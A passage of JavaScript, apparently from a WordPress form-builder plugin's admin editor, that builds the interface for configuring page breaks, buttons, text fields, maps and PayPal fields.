		if(w_type[1]=='text')
			el_type_previous_text.setAttribute("checked","checked");
		else
			el_type_previous_img.setAttribute("checked","checked");
				
	var el_title_previous_label = document.createElement('label');
			el_title_previous_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_title_previous_label.setAttribute("id", "previous_label");
			el_title_previous_label.innerHTML = "Previous name";
		
	var el_title_previous = document.createElement('input');
			el_title_previous.setAttribute("id", "el_title_previous");
			el_title_previous.setAttribute("type", "text");
			el_title_previous.setAttribute("value", w_title[1]);
			el_title_previous.style.cssText =   "width:150px; padding:0; border-width: 1px";
			el_title_previous.setAttribute("onKeyUp", "change_pagebreak_label( this.value, 'previous');");
			el_title_previous.setAttribute("onChange", "change_pagebreak_label( this.value, 'previous');");
			
	var el_style_previous_label = document.createElement('label');
	        el_style_previous_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_style_previous_label.innerHTML = "Previous Class name";
	
	var el_style_previous_textarea = document.createElement('input');
            el_style_previous_textarea.setAttribute("id", "previous_element_style");
			el_style_previous_textarea.setAttribute("type", "text");
			el_style_previous_textarea.setAttribute("value", w_class[1]);
            el_style_previous_textarea.style.cssText = "width:100px;";
            el_style_previous_textarea.setAttribute("onChange", "change_pagebreak_class(this.value, 'previous')");

	var el_check_previous_label = document.createElement('label');
			el_check_previous_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_check_previous_label.innerHTML = "Check the required fields";
		
	var el_check_previous_input = document.createElement('input');
			el_check_previous_input.setAttribute("id", "el_check_previous_input");
			el_check_previous_input.setAttribute("type", "checkbox");
			el_check_previous_input.setAttribute("onClick", "set_checkable('previous');");
			
	if(w_check[1]=="true")
		el_check_previous_input.setAttribute("checked","checked");
		

			
			
			
			
			
			
			

			
	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr( 'type_checkbox')");

	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
	
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var hr = document.createElement('hr');
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8= document.createElement('br');
	var br9= document.createElement('br');
	var br10= document.createElement('br');
	var br11= document.createElement('br');
	var br12= document.createElement('br');
	var br13= document.createElement('br');
	var br14= document.createElement('br');
	var br20= document.createElement('br');
	var br21= document.createElement('br');
	var br22= document.createElement('br');
	
	edit_main_td1.appendChild(el_page_title_label);
	edit_main_td1_1.appendChild(el_page_title_input);
	
	edit_main_td3.appendChild(el_type_next_label);
	edit_main_td3.appendChild(br10);
	edit_main_td3.appendChild(el_title_next_label);
	edit_main_td3.appendChild(br11);
	edit_main_td3.appendChild(el_style_next_label);
	edit_main_td3.appendChild(br12);
	edit_main_td3.appendChild(el_check_next_label);
	edit_main_td3_1.appendChild(el_type_next_button);
	edit_main_td3_1.appendChild(Button_next);
	edit_main_td3_1.appendChild(el_type_next_text);
	edit_main_td3_1.appendChild(Text_next);
	edit_main_td3_1.appendChild(el_type_next_img);
	edit_main_td3_1.appendChild(Image_next);
	edit_main_td3_1.appendChild(br);
	edit_main_td3_1.appendChild(el_title_next);
	edit_main_td3_1.appendChild(br4);
	edit_main_td3_1.appendChild(el_style_next_textarea);
	edit_main_td3_1.appendChild(br7);
	edit_main_td3_1.appendChild(el_check_next_input);
	
	//edit_main_td5.appendChild(hr);
	
	edit_main_td4.appendChild(el_type_previous_label);
	edit_main_td4.appendChild(br20);
	edit_main_td4.appendChild(el_title_previous_label);
	edit_main_td4.appendChild(br21);
	edit_main_td4.appendChild(el_style_previous_label);
	edit_main_td4.appendChild(br22);
	edit_main_td4.appendChild(el_check_previous_label);
	
	edit_main_td4_1.appendChild(el_type_previous_button);
	edit_main_td4_1.appendChild(Button_previous);
	edit_main_td4_1.appendChild(el_type_previous_text);
	edit_main_td4_1.appendChild(Text_previous);
	edit_main_td4_1.appendChild(el_type_previous_img);
	edit_main_td4_1.appendChild(Image_previous);
	edit_main_td4_1.appendChild(el_title_previous);
	edit_main_td4_1.appendChild(br5);
	edit_main_td4_1.appendChild(el_style_previous_textarea);
	edit_main_td4_1.appendChild(br8);
	edit_main_td4_1.appendChild(el_check_previous_input);
	
	
	
	edit_main_td2.appendChild(el_attr_label);
	edit_main_td2.appendChild(el_attr_add);
	edit_main_td2.appendChild(br3);
	edit_main_td2.appendChild(el_attr_table);
	edit_main_td2.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
//	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr6.appendChild(edit_main_td6);
//	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr5.appendChild(edit_main_td5);
//	edit_main_tr5.appendChild(edit_main_td5_1);

	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr2);

	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='button';	type='button'; 
    var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", "_elemet_tableform_id_temp");
	
    var tr = document.createElement('tr');
	
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", "_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
			
		var adding_next = document.createElement('div');
				adding_next.setAttribute("align","right");
				adding_next.setAttribute("id","_element_section_next");
	    
		var adding_next_button =  make_pagebreak_button('next',w_title[0],w_type[0], w_class[0] , 0)	;
			
		adding_next.appendChild(adding_next_button);
		
		var adding_previous = document.createElement('div');
				adding_previous.setAttribute("align","left");
				adding_previous.setAttribute("id","_element_section_previous");
	    
		var adding_previous_button =  make_pagebreak_button('previous',w_title[1],w_type[1], w_class[1] , 0)	;
				
		adding_previous.appendChild(adding_previous_button);
		
		var div_fields = document.createElement('div');
				div_fields.setAttribute("align","center");
				div_fields.setAttribute("style","border:2px solid blue;padding:20px; margin:20px");
				div_fields.innerHTML='FIELDS';
		
		
		var div_page_title = document.createElement('div');
				div_page_title.innerHTML=w_page_title+'<br/><br/>';
				div_page_title.setAttribute("id", "div_page_title");
				div_page_title.setAttribute("align","center");
		
		var div_between = document.createElement('div');
				div_between.setAttribute("page_title", w_page_title);
				div_between.setAttribute("next_type", w_type[0]);
				div_between.setAttribute("next_title", w_title[0]);
				div_between.setAttribute("next_class", w_class[0]);
				div_between.setAttribute("next_checkable", w_check[0]);
				div_between.setAttribute("previous_type", w_type[1]);
				div_between.setAttribute("previous_title", w_title[1]);
				div_between.setAttribute("previous_class", w_class[1]);
				div_between.setAttribute("previous_checkable", w_check[1]);
				div_between.setAttribute("align","center");
				div_between.setAttribute("id", "_div_between");
				div_between.innerHTML="--------------------------------------<br />P A G E B R E A K<br />--------------------------------------"
				
		td2.appendChild(div_page_title);
		td2.appendChild(div_fields);
		td2.appendChild(adding_next);
		td2.appendChild(div_between);
		td2.appendChild(adding_previous);
      	var main_td  = document.getElementById('show_table');
	
      
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br1);
      	main_td.appendChild(div);
refresh_attr(i, 'type_page_break');
}

function set_checkable(type)
{
	document.getElementById("_div_between").setAttribute(type+'_checkable',document.getElementById("el_check_"+type+"_input").checked);
}

function pagebreak_title_change(val) {
  val = val.replace(/(<([^>]+)>)/ig, "");
	document.getElementById("_div_between").setAttribute('page_title',val);
	document.getElementById("div_page_title").innerHTML=val+'<br/><br/>';
}

function change_pagebreak_class(val, type)
{
	document.getElementById("page_"+type+'_0').setAttribute('class', val);
	document.getElementById("_div_between").setAttribute(type+'_class',val);
}

function change_pagebreak_label(val, type)
{
button_type=document.getElementById("_div_between").getAttribute(type+'_type');
if(button_type!="img")
{
	document.getElementById("page_"+type+'_0').value=val;
	document.getElementById("page_"+type+'_0').innerHTML=val;
}
else
{
	document.getElementById("page_"+type+'_0').src=val;
}
	document.getElementById("_div_between").setAttribute(type+'_title',val);

}

function pagebreak_type_change( pagebreak_type, button_type)
{
document.getElementById("_div_between").setAttribute(pagebreak_type+'_type',button_type);
	switch(button_type)
	{
		case 'button': 
		{ 
			document.getElementById("_div_between").setAttribute(pagebreak_type+'_title', pagebreak_type);
			
			var el_title_label = document.createElement('label');
				el_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_title_label.setAttribute('id', pagebreak_type+"_label");
				el_title_label.setAttribute('type', "button");
				el_title_label.innerHTML = pagebreak_type+" "+ button_type+" name";
			
			document.getElementById(pagebreak_type+"_label").parentNode.replaceChild(el_title_label, document.getElementById(pagebreak_type+"_label"));
			
			document.getElementById("el_title_"+pagebreak_type).value=pagebreak_type;
			
			var element = document.createElement('button');
				element.setAttribute('id', "page_"+pagebreak_type+'_0');
				element.setAttribute('class', document.getElementById("_div_between").getAttribute(pagebreak_type+'_class'));
				element.style.cursor="pointer";
				element.innerHTML=pagebreak_type;
				
			
			document.getElementById("_element_section_"+pagebreak_type).replaceChild(element, document.getElementById("page_"+pagebreak_type+'_0'));
			
			break;
		}
		case 'text': {	

			document.getElementById("_div_between").setAttribute(pagebreak_type+'_title', pagebreak_type);
		
			var el_title_label = document.createElement('label');
				el_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_title_label.setAttribute('id', pagebreak_type+"_label");
				el_title_label.innerHTML = pagebreak_type+" "+ button_type+" name";

			document.getElementById(pagebreak_type+"_label").parentNode.replaceChild(el_title_label, document.getElementById(pagebreak_type+"_label"));
			
			document.getElementById("el_title_"+pagebreak_type).value=pagebreak_type;
			
			var element = document.createElement('span');
				element.setAttribute('id', "page_"+pagebreak_type+'_0');
				element.setAttribute('class', document.getElementById("_div_between").getAttribute(pagebreak_type+'_class'));
				element.style.cursor="pointer";
				element.innerHTML=pagebreak_type;

			document.getElementById("_element_section_"+pagebreak_type).replaceChild(element, document.getElementById("page_"+pagebreak_type+'_0'));
			
			  break;
		}
		case 'img':{ 			
		
		document.getElementById("_div_between").setAttribute(pagebreak_type+'_title', fmc_plugin_url+'/images/'+pagebreak_type+'.png');
			
		var el_title_label = document.createElement('label');
				el_title_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_title_label.setAttribute('id', pagebreak_type+"_label");
				el_title_label.innerHTML = pagebreak_type+" "+ button_type+" src";

			document.getElementById(pagebreak_type+"_label").parentNode.replaceChild(el_title_label, document.getElementById(pagebreak_type+"_label"));
			
			document.getElementById("el_title_"+pagebreak_type).value=fmc_plugin_url+'/images/'+pagebreak_type+'.png';
			
			var element = document.createElement('img');
				element.setAttribute('id', "page_"+pagebreak_type+'_0');
				element.setAttribute('class', document.getElementById("_div_between").getAttribute(pagebreak_type+'_class'));
				element.style.cursor="pointer";
				element.src=fmc_plugin_url+'/images/'+pagebreak_type+'.png';
				
			document.getElementById("_element_section_"+pagebreak_type).replaceChild(element, document.getElementById("page_"+pagebreak_type+'_0'));
			
			  break;
		}

}
}

function addRow(b) {
	if (document.getElementById('show_table').innerHTML) {
    document.getElementById('show_table').innerHTML = "";
    document.getElementById('edit_table').innerHTML = "";
  }
	alltypes = Array('customHTML','text','checkbox','radio','time_and_date','select','file_upload','captcha','map','button','page_break','section_break', 'paypal', 'survey');
  for (x = 0; x < 14; x++) {
      if (alltypes[x] != 'time_and_date' && alltypes[x] != 'select' && alltypes[x] != 'checkbox' && alltypes[x] != 'radio' && alltypes[x] != 'file_upload' && alltypes[x] != 'paypal' && alltypes[x] != 'survey') {
      document.getElementById('img_'+alltypes[x]).parentNode.style.backgroundColor = '';
    }
  }
  document.getElementById('img_' + b).parentNode.style.backgroundColor = '#FE6400';
	switch(b) {
		case 'customHTML': { el_editor();  break;}
		case 'text': { el_text();  break;}
		case 'checkbox':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break;}
		case 'radio':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break;}
		case 'time_and_date':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break; }
		case 'select':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break; }
		case 'file_upload':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break; }
		case 'captcha':{ el_captcha(); break; }
		case 'map':{ el_map(); break; }
		case 'button':{ el_button(); break; }
		case 'page_break':{ el_page_break(); break; }
		case 'section_break':{ el_section_break(); break; }
    case 'paypal':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break; }
    case 'survey':{ alert('This field type is disabled in free version. If you need this functionality, you need to buy the commercial version.'); break; }
  }
  var pos = document.getElementsByName("el_pos");
  pos[0].checked = "checked";
}

function go_to_type_star_rating(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_star_rating(new_id,'Star Rating:', 'left', 'yellow', '5', 'no', 'wdform_star_rating', w_attr_name, w_attr_value);			
}


function go_to_type_scale_rating(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	w_mini_labels=['Worst', 'Best'];
	type_scale_rating(new_id,'Scale Rating:', 'left', w_mini_labels, '5', 'no','wdform_scale_rating',w_attr_name, w_attr_value);			
}

function go_to_type_spinner(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
type_spinner(new_id,'Spinner:', 'left', '50', '', '', '1', '', 'no','',w_attr_name, w_attr_value);			

}

function go_to_type_slider(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
type_slider(new_id,'Slider:', 'left', '200', '0', '100', '0', 'no','',w_attr_name, w_attr_value);				
}

function go_to_type_range(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
  w_mini_labels = ['From', 'To'];
  type_range (new_id,'Range:', 'left', '30', '1' , '', '', w_mini_labels, 'no','',w_attr_name, w_attr_value);			

}

function go_to_type_grading(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	w_items = ['item1','item2','item3'];

type_grading(new_id,'Grading:', 'left', w_items, '100', 'no','wdform_grading',w_attr_name, w_attr_value);			

}

function go_to_type_matrix(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	
	w_rows = ['','row1','row2'];
	w_columns = ['','column1','column2'];
  type_matrix(new_id,'Matrix:', 'left', 'radio', w_rows, w_columns, 'no','wdform_matrix',w_attr_name, w_attr_value);				
}

function go_to_type_paypal_price(new_id) {
  w_attr_name = [];
 	w_attr_value = [];
 	w_first_val = ['',''];
 	w_title = ['',''];
  w_mini_labels=['Dollars','Cents'];
	type_paypal_price(new_id,'Amount:', 'left', w_first_val, w_title, w_mini_labels, '100', 'no', 'no', '',w_attr_name, w_attr_value, '', '')
}

function go_to_type_paypal_select(new_id) {
 	w_choices = [ "Select product", "Product 1", "Product 2"];
 	w_choices_price = [ "", "100", "200"];
 	w_choices_checked = ["1", "0", "0"];
	w_choices_disabled = [true, false, false];
 	w_attr_name = [];
 	w_attr_value = [];
 	w_property = [];
 	w_property_values = [];
	type_paypal_select(new_id, 'Select Product:', 'left', '200',w_choices, w_choices_price, w_choices_checked, 'no','no','wdform_select',w_attr_name, w_attr_value, w_choices_disabled, w_property, w_property_values);
}

function go_to_type_paypal_checkbox(new_id) {
 	w_choices = [ "Product 1", "Product 2"];
 	w_choices_price = [ "100", "200"];
 	w_choices_checked = ["0", "0"];
 	w_attr_name = [];
 	w_attr_value = [];
 	w_property = [];
 	w_property_values = [];
	type_paypal_checkbox(new_id,'Checkbox:', 'left', 'ver', w_choices,w_choices_price, w_choices_checked, 'no', 'no', 'no','0', '',w_attr_name, w_attr_value, w_property, w_property, w_property_values, 'no');
}

function go_to_type_paypal_radio(new_id) {
 	w_choices = [ "Product 1", "Product 2"];
	w_choices_price = [ "100", "200"];
	w_choices_checked = ["0", "0"];
 	w_attr_name = [];
	w_attr_value = [];
	w_property = [];
 	w_property_values = [];
	type_paypal_radio(new_id,'Radio:', 'left', 'ver', w_choices, w_choices_price, w_choices_checked, 'no', 'no', 'no','0','',w_attr_name, w_attr_value,  w_property, w_property_values);
}

function go_to_type_paypal_shipping(new_id) {
 	w_choices = [ "Type 1", "Type 2"];
  w_choices_price = [ "100", "200"];
	w_choices_checked = ["0", "0"];
	w_attr_name = [];
 	w_attr_value = [];
 	w_property = [];
	w_property_values = [];
	type_paypal_shipping(new_id,'Shipping:', 'left', 'ver', w_choices, w_choices_price, w_choices_checked, 'no', 'no', 'no','0','',w_attr_name, w_attr_value,  w_property, w_property_values);
}

function go_to_type_paypal_total(new_id) {
  type_paypal_total(new_id,'Total:', 'left', '');
}

function el_section_break() {
  if (document.getElementById("editing_id").value) {
		new_id = document.getElementById("editing_id").value;
  }
	else {
		new_id = gen;
  }
	var pos = document.getElementsByName("el_pos");
	pos[0].removeAttribute("disabled");
	pos[1].removeAttribute("disabled");
	pos[2].removeAttribute("disabled");
	var sel_el_pos = document.getElementById("sel_el_pos");
	sel_el_pos.removeAttribute("disabled", "disabled");
	type_section_break(new_id,'<hr/>');
}

function el_button() {
  if (document.getElementById("editing_id").value) {
    new_id=document.getElementById("editing_id").value;
  }
  else {
    new_id = gen;
  }
	


//edit table
	var td  = document.getElementById('edit_table');
	//type select		
	var el_type_label = document.createElement('label');
	
	el_type_label.style.cssText = "color: #00aeef; font-weight: bold; font-size: 13px";
	el_type_label.innerHTML = "<br />&nbsp;&nbsp;Field type";
	td.appendChild(el_type_label);
	var el_type_radio_submit_reset = document.createElement('input');
                el_type_radio_submit_reset.setAttribute("type", "radio");
		el_type_radio_submit_reset.style.cssText = "margin-left:15px";
                el_type_radio_submit_reset.setAttribute("name", "el_type");
                el_type_radio_submit_reset.setAttribute("onclick", "go_to_type_submit_reset('"+new_id+"')");
		el_type_radio_submit_reset.setAttribute("checked", "checked");
		Submit_and_Reset = document.createTextNode("Submit and Reset");
		
	var el_type_radio_custom = document.createElement('input');
                el_type_radio_custom.setAttribute("type", "radio");
		el_type_radio_custom.style.cssText = "margin-left:15px";
               
	       el_type_radio_custom.setAttribute("name", "el_type");
                el_type_radio_custom.setAttribute("onclick", "go_to_type_button('"+new_id+"')");
		Custom = document.createTextNode("Custom");
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	

	td.appendChild(br1);
	td.appendChild(el_type_radio_submit_reset);
	td.appendChild(Submit_and_Reset);
	td.appendChild(br2);
	td.appendChild(el_type_radio_custom);
	td.appendChild(Custom);

	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");


	go_to_type_submit_reset(new_id);
	
}

function go_to_type_hidden(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_hidden(new_id,'', '', '', w_attr_name, w_attr_value);
}

function go_to_type_submit_reset(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_submit_reset(new_id,'Submit', 'Reset', '', true, w_attr_name, w_attr_value);
}

function go_to_type_mark_map(new_id)
{
 	w_attr_name=[];
 	w_attr_value=[];
	type_mark_map(new_id, 'Mark your place on map:', 'left', '2.294254', '48.858334', "2.294254", "48.858334", "13", "400","300", 'wdform_map', '', w_attr_name, w_attr_value);
}

function el_map()
{
    if(document.getElementById("editing_id").value)
        new_id=document.getElementById("editing_id").value;
    else
        new_id=gen;

    w_long=['2.294254'];
    w_lat=['48.858334'];
    w_info=[''];

    var pos=document.getElementsByName("el_pos");
    pos[0].removeAttribute("disabled");
    pos[1].removeAttribute("disabled");
    pos[2].removeAttribute("disabled");

    var sel_el_pos=document.getElementById("sel_el_pos");
    sel_el_pos.removeAttribute("disabled", "disabled");

    w_attr_name=[];
    w_attr_value=[];
    type_map(new_id, '2.294254', '48.858334', w_long, w_lat, "13", "400","300", 'wdform_map', w_info, w_attr_name, w_attr_value);
}

function el_editor()
{
	if(document.getElementById("editing_id").value)
	new_id=document.getElementById("editing_id").value;
else
	new_id=gen;
	

	var pos=document.getElementsByName("el_pos");
			pos[0].removeAttribute("disabled");
			pos[1].removeAttribute("disabled");
			pos[2].removeAttribute("disabled");
		
	var sel_el_pos=document.getElementById("sel_el_pos");
		sel_el_pos.removeAttribute("disabled", "disabled");

	type_editor(new_id,'');
}

function el_text()
{
	
if(document.getElementById("editing_id").value)
	new_id=document.getElementById("editing_id").value;
else
	new_id=gen;
	

//edit table
	var td  = document.getElementById('edit_table');
	//type select		
	var el_type_label = document.createElement('label');
	
	el_type_label.style.cssText = "color: #00aeef; font-weight: bold; font-size: 13px";
	//el_type_label.setAttribute("style" , "color: #00aeef; font-weight: bold; font-size: 13px", 0 );
	el_type_label.innerHTML = "<br />&nbsp;&nbsp;Field type";
	td.appendChild(el_type_label);

	var el_type_radio_text = document.createElement('input');
                el_type_radio_text.setAttribute("id", "el_type_radio_text");
                el_type_radio_text.setAttribute("type", "radio");
				el_type_radio_text.style.cssText = "margin-left:15px";
                el_type_radio_text.setAttribute("value", "text");
                el_type_radio_text.setAttribute("name", "el_type");
                el_type_radio_text.setAttribute("onclick", "go_to_type_text('"+new_id+"')");
		el_type_radio_text.setAttribute("checked", "checked");
		Text = document.createTextNode("Simple text");
		
	var el_type_radio_password = document.createElement('input');
                el_type_radio_password.setAttribute("id", "el_type_radio_password");
                el_type_radio_password.setAttribute("type", "radio");
				el_type_radio_password.style.cssText = "margin-left:15px";
                el_type_radio_password.setAttribute("value", "password");
                el_type_radio_password.setAttribute("name", "el_type");
                el_type_radio_password.setAttribute("onclick", "go_to_type_password('"+new_id+"')");
		Password = document.createTextNode("Password");

	var el_type_radio_textarea = document.createElement('input');
                el_type_radio_textarea.setAttribute("id", "el_type_radio_textarea");
                el_type_radio_textarea.setAttribute("type", "radio");
				el_type_radio_textarea.style.cssText = "margin-left:15px";
                el_type_radio_textarea.setAttribute("value", "textarea");
                el_type_radio_textarea.setAttribute("name", "el_type");
                el_type_radio_textarea.setAttribute("onclick", "go_to_type_textarea('"+new_id+"')");
		Textarea = document.createTextNode("Text area");
		
	var el_type_radio_name = document.createElement('input');
                el_type_radio_name.setAttribute("id", "el_type_radio_name");
                el_type_radio_name.setAttribute("type", "radio");
				el_type_radio_name.style.cssText = "margin-left:15px";
                el_type_radio_name.setAttribute("value", "name");
                el_type_radio_name.setAttribute("name", "el_type");
                el_type_radio_name.setAttribute("onclick", "go_to_type_name('"+new_id+"')");
		Name = document.createTextNode("Name");
		
	var el_type_radio_submitter_mail= document.createElement('input');
                el_type_radio_submitter_mail.setAttribute("id", "el_type_radio_submitter_mail");
                el_type_radio_submitter_mail.setAttribute("type", "radio");
				el_type_radio_submitter_mail.style.cssText = "margin-left:15px";
                el_type_radio_submitter_mail.setAttribute("value", "submitter_mail");
                el_type_radio_submitter_mail.setAttribute("name", "el_type");
                el_type_radio_submitter_mail.setAttribute("onclick", "go_to_type_submitter_mail('"+new_id+"')");
		Submitter_mail = document.createTextNode("E-mail");

	var el_type_radio_number= document.createElement('input');
                el_type_radio_number.setAttribute("id", "el_type_radio_number");
                el_type_radio_number.setAttribute("type", "radio");
				el_type_radio_number.style.cssText = "margin-left:15px";
                el_type_radio_number.setAttribute("value", "number");
                el_type_radio_number.setAttribute("name", "el_type");
                el_type_radio_number.setAttribute("onclick", "go_to_type_number('"+new_id+"')");
		Number = document.createTextNode("Number");


	var el_type_radio_phone= document.createElement('input');
                el_type_radio_phone.setAttribute("id", "el_type_radio_phone");
                el_type_radio_phone.setAttribute("type", "radio");
				el_type_radio_phone.style.cssText = "margin-left:15px";
                el_type_radio_phone.setAttribute("value", "phone");
                el_type_radio_phone.setAttribute("name", "el_type");
                el_type_radio_phone.setAttribute("onclick", "go_to_type_phone('"+new_id+"')");
		Phone = document.createTextNode("Phone");

	var el_type_radio_hidden = document.createElement('input');
                el_type_radio_hidden.setAttribute("type", "radio");
				el_type_radio_hidden.style.cssText = "margin-left:15px";
                el_type_radio_hidden.setAttribute("name", "el_type");
                el_type_radio_hidden.setAttribute("onclick", "go_to_type_hidden('"+new_id+"')");
		Hidden = document.createTextNode("Hidden field");
		
var el_type_radio_address = document.createElement('input');
                el_type_radio_address.setAttribute("id", "el_type_radio_address");
                el_type_radio_address.setAttribute("type", "radio");
				el_type_radio_address.style.cssText = "margin-left:15px";
                el_type_radio_address.setAttribute("value", "address");
                el_type_radio_address.setAttribute("name", "el_type");
                el_type_radio_address.setAttribute("onchange", "go_to_type_address('"+new_id+"')");
		Address = document.createTextNode("Address");
	
var el_type_radio_mark_map = document.createElement('input');
                el_type_radio_mark_map.setAttribute("id", "el_type_radio_mark_map");
                el_type_radio_mark_map.setAttribute("type", "radio");
				el_type_radio_mark_map.style.cssText = "margin-left:15px";
                el_type_radio_mark_map.setAttribute("value", "mark_map");
                el_type_radio_mark_map.setAttribute("name", "el_type");
                el_type_radio_mark_map.setAttribute("onchange", "go_to_type_mark_map('"+new_id+"')");
		Mark_map = document.createTextNode("Address(mark on map)");
	
	
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');
	var br8 = document.createElement('br');
	var br9 = document.createElement('br');
	var br10 = document.createElement('br');
	

	td.appendChild(br1);
	td.appendChild(el_type_radio_text);
	td.appendChild(Text);
	td.appendChild(br2);
	td.appendChild(el_type_radio_password);
	td.appendChild(Password);
	td.appendChild(br3);
	td.appendChild(el_type_radio_textarea);
	td.appendChild(Textarea);
	td.appendChild(br4);
	td.appendChild(el_type_radio_name);
	td.appendChild(Name);
